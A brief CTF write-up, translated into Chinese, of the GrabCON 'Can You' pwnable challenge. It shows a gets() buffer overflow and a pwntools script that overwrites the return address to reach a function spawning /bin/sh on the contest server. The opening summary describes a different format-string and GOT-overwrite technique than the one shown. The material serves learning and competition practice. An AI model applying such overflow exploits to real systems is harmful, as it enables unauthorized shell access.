2021-09-09 · 2분
GrabCON CTF — Can You write-up
GrabCON pwnable 的 write-up(cancancan):先追了栈金丝雀泄露这条错误线索,后来发现 printf(buf) 在 offset 6 处存在 FSB,并用 win 函数覆盖 read 的 GOT 表项。
2021-09-09 · 1분
这篇文章发布已超过两年,内容可能已过时。
GrabCON CTF
这次参加 GrabCON,只稍微解了点 pwnable 就走了。总共 4 题,但只解出 3 题,非常难过 ㅠ。
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4[48]; // [rsp+0h] [rbp-30h] BYREF
gets(v4, argv, envp);
printf("well lets check if you can bypass me!!!");
return 0;
}
__int64 vuln()
{
execve("/bin/sh", 0LL, 0LL);
return 0LL;
}
看起来是非常简单的 BOF 题。文件是 64BIT,payload 大概会是 dummy[48] + sfp[8] + vuln。
源代码
查看更多
from pwn import *
p = remote('35.205.161.145', 49153)
vuln = p64(0x401146)
payload = b''
payload += b'A'*56 + vuln
p.sendline(payload)
p.interactive()
[黑客/系统黑客] - [系统黑客] Buffer Overflow (BOF)
[[系统黑客] Buffer Overflow (BOF)
BUFFER OVERFLOW BOF 是当能接收比所设缓冲区大小更大的输入时产生的漏洞。int __cdecl main(int argc, const char **argv, const char **envp) { char s[40]; // [esp+4h] > ebp-34h..
— nabomhalang.tistory.com
原文(韩语): tistory — 发布于 2021-09-09,已迁移至本博客。本翻译由 AI 协助完成。
…